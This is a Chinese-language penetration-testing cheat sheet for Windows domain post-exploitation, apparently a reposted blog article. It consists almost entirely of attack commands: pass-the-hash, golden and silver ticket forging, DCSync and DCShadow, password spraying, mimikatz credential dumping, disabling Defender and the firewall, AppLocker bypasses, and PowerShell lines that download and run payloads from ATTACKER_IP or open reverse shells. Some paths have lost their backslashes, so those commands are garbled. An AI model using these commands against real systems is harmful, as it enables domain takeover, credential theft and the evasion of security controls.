内网渗透技巧及工具合集

二叶草
二叶草
二叶草
1214
文章
0
评论
2020年3月25日18:59:49 评论 552

 后渗透之横向移动

存储凭证

列出存储的密钥cmdkey /list使用它们runas /user:administrator /savecred "cmd.exe /k whoami"

meterpreter获取token

use incognitolist_tokens -uimpersonate_token NT-AUTHORITYSystem

Mimikatz 传递票据

Enable-PSRemotingmimikatz.exe '" kerberos:ptt C:UsersPublicticketname.kirbi"' "exit"Enter-PSSession -ComputerName ECORP

WinRM

$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force$cred = New-Object System.Management.Automation.PSCredential ('ECORP.localuser', $pass)Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }# Evil-WinRMhttps://github.com/Hackplayers/evil-winrmruby evil-winrm.rb -i 192.168.1.2 -u user -p pass -r evil.corp

传递hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'

数据库链接

# PowerUpSQLhttps://github.com/NetSPI/PowerUpSQLGet-SQLServerLink -Instance server -Verbosepowershell.exe -c "Import-Module C:UsersPublicPowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORPsql"# 查看服务 select srvname from master..sysservers;# 执行命令Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"# 链接数据库的表select * from openquery("ECORPFOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES') # 查询并尝试在该服务器上启用xp cmpshellselect * from openquery("server",'select * from master..sysservers') EXECUTE AS USER = 'internal_user' ('sp_configure "xp_cmdshell",1;reconfigure;') AT "server"

黄金白银票据

# 黄金票据# 提权krbtgt用户hashlsadump::dcsync /domain:evil.corp /user:krbtgtlsadump::lsa /injectlsadump:::lsa /patchlsadump::trust /patch# 创建票据# /rc4 or /krbtgt -  NTLM hash# /sid dump krbtgt得到# /ticket 参数可选,默认是 ticket.kirbi# /groups 参数可选,默认是 513,512,520,518,519# /id 你可以伪造用户并提供有效的管理员idkerberos::golden /user:user /domain:AD.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519 kerberos::ptt golden.tck # 查看票据是否在缓存里powershell.exe -c "klist"#验证黄金票据dir \DCC$psexec.exe \DC cmd.exe#清除缓存票据kerberos::purge #metasploit模块加载黄金票据post/windows/escalate/golden_ticket # 白银票据# 白银票据可以在域上提升权限# /target 目标主机 (ex: share.server.local, sql.server.local:1433, ...)# /service - 票据服务名 (ex: cifs, rpcss, http, mssql, ...)# 例如kerberos::golden /user:user /domain:domain /sid:domain-sid /target:evilcorp-sql102.evilcorp.local:1433 /service:MSSQLSvc /rc4:service-hash /ptt /id:1103sqlcmd -S evilcorp-sql102.evilcorp.localselect SYSTEM_USER;kerberos::golden /user:user /id:500 /domain:targetdomain.com /sid:S-1-5-21-1234567890-123456789-1234567890 /target:targetserver.targetdomain.com /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt

域渗透

# 基于ldap的枚举enum4linux -a 192.168.1.2python windapsearch.py -u user -p morph3 -d evil.corp --dc-ip 192.168.1.2python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd

暴破ldap

# 破解工具https://github.com/dafthack/DomainPasswordSprayImport-Module .DomainPasswordSpray.ps1Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt# 暴破密码./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3 # 暴破用户./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt# Passwordspray避免错误次数锁定用户./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt

DC Shadow

DCShadow是一种通过域控制器使用的合法API来修改活动目录中的现有数据的新型攻击技术,也就是增加一个影子域控,让正常DC通过伪造的DC中复制数据

#查看用户sidwmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
#监听一个rpc服务lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid# 另一个mimikatz运行lsadump::dcshadow /push# 完成之后注销# 重新登录lsadump::dcsync /domain:ECORP.local /account:krbtgt# 获取krbtgt hash#具体的百度dcshadow

DC Sync

lsadump::dcsync /domain:domain /all /csvlsadump::dcsync /user:krbtgt#####https://gist.github.com/monoxgas/9d238accd969550136dbpowershell.exe -c "Import-Module .Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"#####python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc$@10.0.0.1python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL

Bypass 相关

powershell bypass 运行powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')PSByPassCLMpowershell.exe -exec bypass -c

Windows Defender

sc config WinDefend start= disabledsc stop WinDefend# PowershellSet-MpPreference -DisableRealtimeMonitoring $true# RemoveDefinitions"%Program Files%Windows DefenderMpCmdRun.exe" -RemoveDefinitions -All

Firewall

Netsh Advfirewall show allprofilesNetSh Advfirewall set allprofiles state off

ip 白名单

New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

Applocker ByPass

https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.mdhttps://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.mdhttps://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md# MSBuild.exe 运行绕过msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=9001  -f csharp -e x86/shikata_ga_nai -i  > out.cs # 替换buf-sc并将其保存为out.csprojhttps://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20shellcode.xmlInvoke-WebRequest "http://ATTACKER_IP/payload.csproj" -OutFile "out.csproj"; C:windowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe .out.csproj# 或使用下面工具https://github.com/morph3/Msbuild-payload-generatorsudo python msbuild_gen.py -a x86 -i 10 --lhost 192.168.220.130 --lport 9001 -m

GreatSCT 工具

python GreatSCT.py --ip 192.168.1.56 --port 443 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false payload1.exepython3 GreatSCT.py -t Bypass -p regasm/meterpreter/rev_tcp --ip 192.168.1.56 --port 9001C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U payload.dll

EvilSalsa 工具

#准备 payloadspython EncrypterAssembly/encrypterassembly.py EvilSalsa.dll supersecretpass123 evilsalsa.dll.txtEncrypterAssembly.exe EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt#执行 payloadSalseoLoader.exe password http://ATTACKER_IP/evilsalsa.dll.txt reversetcp ATTACKER_IP 9001# 返回一个icmp shellpython icmpsh_m.py "ATTACKER_IP" "VICTIM_IP"SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ATTACKER_IP

其它杂项

#更改文件权限icacls text.txt /grant Everyone:Ftakeown.exe /f c:windowssystem32sethc.exe

下载文件

IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:WindowsTempmalware.exe")  Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:WindowsTempmalware.exe"  certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe

Base64加解密

certutil -encode foo.exe foo.b64   certutil -decode foo.b64 foo.exe

端口转发

# 使用 plinkplink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080# 使用 meterpreterportfwd add -l attacker-port -p victim-port -r victim-ipportfwd add -l 3306 -p 3306 -r 192.168.1.56

Powershell扫描

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) "Port $_ is open!"} 2>$null

恢复powershell安全字符串

######$user = "morph3"$file = "morph3-pass.xml"$cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }######[System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR("string"))######$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)$result

注入powershell脚本到session

Invoke-Command -FilePath scriptname -Sessions $sessionsEnter-PSSession -Session $sess

Mimikatz解密EFS文件

privilege::debug token::elevate crypto::system /file:"C:UsersAdministratorAppDataRoamingMicrosoftSystemCertificatesMyCertificatesthecert" /exportdpapi::capi /in:"C:UsersAdministratorAppDataRoamingMicrosoftCryptoRSASIDid"# 清除文本密码 dpapi::masterkey /in:"C:UsersAdministratorAppDataRoamingMicrosoftProtectSIDmasterkey" /password:pass123# 执行此命令后,必须保存导出的.der和.pvk文件dpapi::capi /in:"C:UsersAdministratorAppDataRoamingMicrosoftCryptoRSASIDid" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80bopenssl x509 -inform DER -outform PEM -in blah.der -out public.pemopenssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pemopenssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx# 导入证书certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoottype "C:UsersAdministratorDocumentsencrypted.txt"

渗透后期信息收集

查看日志

Get-WinEvent -ListLog *# 列出特定用户的日志$cred = Get-CredentialsGet -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred# 读取安全日志(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName'$_.Properties[8].Value }}).commandline

Dump密码

# Metasploitpost/windows/gather/enum_chromepost/multi/gather/firefox_credspost/firefox/gather/cookiespost/firefox/gather/passwordspost/windows/gather/forensics/browser_historypost/windows/gather/enum_putty_saved_sessions# Empirecollection/ChromeDumpcollection/FoxDumpcollection/netrippercredentials/sessiongopher# mimikatzprivilege::debugsekurlsa::logonpasswords

Shadow copy

复制影子文件(NTDS.dit,SYSTEM等)

diskshadow.exeset context persistent nowritersadd volume C: alias morph3createexpose %morph3% Z:delete shadows volume %morph3%reset

Ddump NTDS.dit

secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result localpython crackmapexec.py 192.168.1.56 -u morph3 -p pass1234 -d evilcorp.com --ntds drsuapi# mimikatzlsadump::lsa /inject

其它一些工具

https://github.com/DanMcInerney/icebreakerhttps://github.com/BloodHoundAD/BloodHoundhttps://github.com/EmpireProject/Empirehttps://github.com/byt3bl33d3r/DeathStarhttps://github.com/byt3bl33d3r/CrackMapExechttps://github.com/cobbr/Covenanthttps://github.com/GhostPack/Rubeushttps://github.com/GhostPack/SharpDPAPIhttps://github.com/Genetic-Malware/Ebowlahttps://github.com/Veil-Framework/Veilhttps://github.com/padovah4ck/PSByPassCLMhttps://github.com/SecureAuthCorp/impacket

本文来源于:内网渗透技巧及工具合集-变化吧门户
特别声明:以上文章内容仅代表作者本人观点,不代表变化吧门户观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。

二叶草
渗透测试实用工具 渗透

渗透测试实用工具

 工具概述 1、新增批量修改文件夹文件后缀功能,并重新排列工具,更加详细使用 2、新增文件夹监控功能,监控python tool.py -monitor C: 3、新增将包含rgb值的txt...
简谈渗透测试各阶段我常用的那些“神器” 渗透

简谈渗透测试各阶段我常用的那些“神器”

 前言 本人所有文章都很用心的写作完成,并时常总结如何分享更有用的东西给朋友们。这篇更是如此,晚上准备到凌晨四点开始写作,为了需要的朋友而写,不喜欢的右上角点叉不要像上次文章一样在下面喷粪逼我骂你,另...
内网渗透工具- Intranet-Penetration 渗透

内网渗透工具- Intranet-Penetration

 整理一些常用的内外网渗透测试工具 PHPoxy 通过PHP脚本运行一个可以访问内网机器的Web代理。 SocksCap  socks5代理客户端 XX-Net    科学上网利器 phpsocks5...